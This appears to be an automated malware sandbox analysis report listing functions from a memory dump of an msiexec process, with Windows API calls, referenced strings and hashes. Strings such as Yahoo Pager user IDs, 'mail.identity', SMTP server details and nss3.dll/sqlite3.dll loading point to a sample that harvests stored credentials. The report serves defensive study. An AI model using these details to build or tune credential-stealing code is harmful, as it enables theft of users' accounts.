                                                                                • String ID: smtp
                                                                                • API String ID: 2625860049-60245459
                                                                                • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040C28C
                                                                                • SetFocus.USER32(?,?), ref: 0040C314
                                                                                  • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: FocusMessagePostmemset
                                                                                • String ID: S_@$l
                                                                                • API String ID: 3436799508-4018740455
                                                                                • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004092C0
                                                                                • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                Strings
                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileString_mbscpymemset
                                                                                • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                • API String ID: 408644273-3424043681
                                                                                • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscpy
                                                                                • String ID: C^@$X$ini
                                                                                • API String ID: 714388716-917056472
                                                                                • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                APIs
                                                                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                • String ID: MS Sans Serif
                                                                                • API String ID: 3492281209-168460110
                                                                                • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName_strcmpimemset
                                                                                • String ID: edit
                                                                                • API String ID: 275601554-2167791130
                                                                                • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: strlen$_mbscat
                                                                                • String ID: 3CD
                                                                                • API String ID: 3951308622-1938365332
                                                                                • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: rows deleted
                                                                                • API String ID: 2221118986-571615504
                                                                                • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                APIs
                                                                                  • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$memset
                                                                                • String ID:
                                                                                • API String ID: 1860491036-0
                                                                                • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                • Opcode Fuzzy Hash: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040D2C2
                                                                                • memset.MSVCRT ref: 0040D2D8
                                                                                • memset.MSVCRT ref: 0040D2EA
                                                                                • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                • memset.MSVCRT ref: 0040D319
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$memcpy
                                                                                • String ID:
                                                                                • API String ID: 368790112-0
                                                                                • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                APIs
                                                                                Strings
                                                                                • too many SQL variables, xrefs: 0042C6FD
                                                                                • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                • API String ID: 2221118986-515162456
                                                                                • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                APIs
                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                • memset.MSVCRT ref: 004026AD
                                                                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                  • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                  • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                • String ID:
                                                                                • API String ID: 3503910906-0
                                                                                • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                APIs
                                                                                  • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                                  • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                • strlen.MSVCRT ref: 0040B60B
                                                                                • atoi.MSVCRT(?), ref: 0040B619
                                                                                • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                • String ID:
                                                                                • API String ID: 4107816708-0
                                                                                • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                • _gmtime64.MSVCRT ref: 00411437
                                                                                • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                • strftime.MSVCRT ref: 00411476
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                • String ID:
                                                                                • API String ID: 1886415126-0
                                                                                • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: strlen
                                                                                • String ID: >$>$>
                                                                                • API String ID: 39653677-3911187716
                                                                                • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                APIs
                                                                                • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: @
                                                                                • API String ID: 3510742995-2766056989
                                                                                • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _strcmpi
                                                                                • String ID: C@$mail.identity
                                                                                • API String ID: 1439213657-721921413
                                                                                • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00444573
                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValuememset
                                                                                • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                • API String ID: 3363972335-1703613266
                                                                                • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00406640
                                                                                  • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset$memcmp
                                                                                • String ID: Ul@
                                                                                • API String ID: 270934217-715280498
                                                                                • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                APIs
                                                                                  • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                Strings
                                                                                • recovered %d pages from %s, xrefs: 004188B4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                • String ID: recovered %d pages from %s
                                                                                • API String ID: 985450955-1623757624
                                                                                • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _ultoasprintf
                                                                                • String ID: %s %s %s
                                                                                • API String ID: 432394123-3850900253
                                                                                • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                APIs
                                                                                • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                • sprintf.MSVCRT ref: 0040909B
                                                                                  • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                  • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                  • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                  • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                  • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                • String ID: menu_%d
                                                                                • API String ID: 1129539653-2417748251
                                                                                • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                APIs
                                                                                Strings
                                                                                • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _msizerealloc
                                                                                • String ID: failed memory resize %u to %u bytes
                                                                                • API String ID: 2713192863-2134078882
                                                                                • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                APIs
                                                                                • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                • _mbscat.MSVCRT ref: 004070FA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscat$_mbscpystrlen
                                                                                • String ID: sqlite3.dll
                                                                                • API String ID: 1983510840-1155512374
                                                                                • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                APIs
                                                                                • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileString
                                                                                • String ID: A4@$Server Details
                                                                                • API String ID: 1096422788-4071850762
                                                                                • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
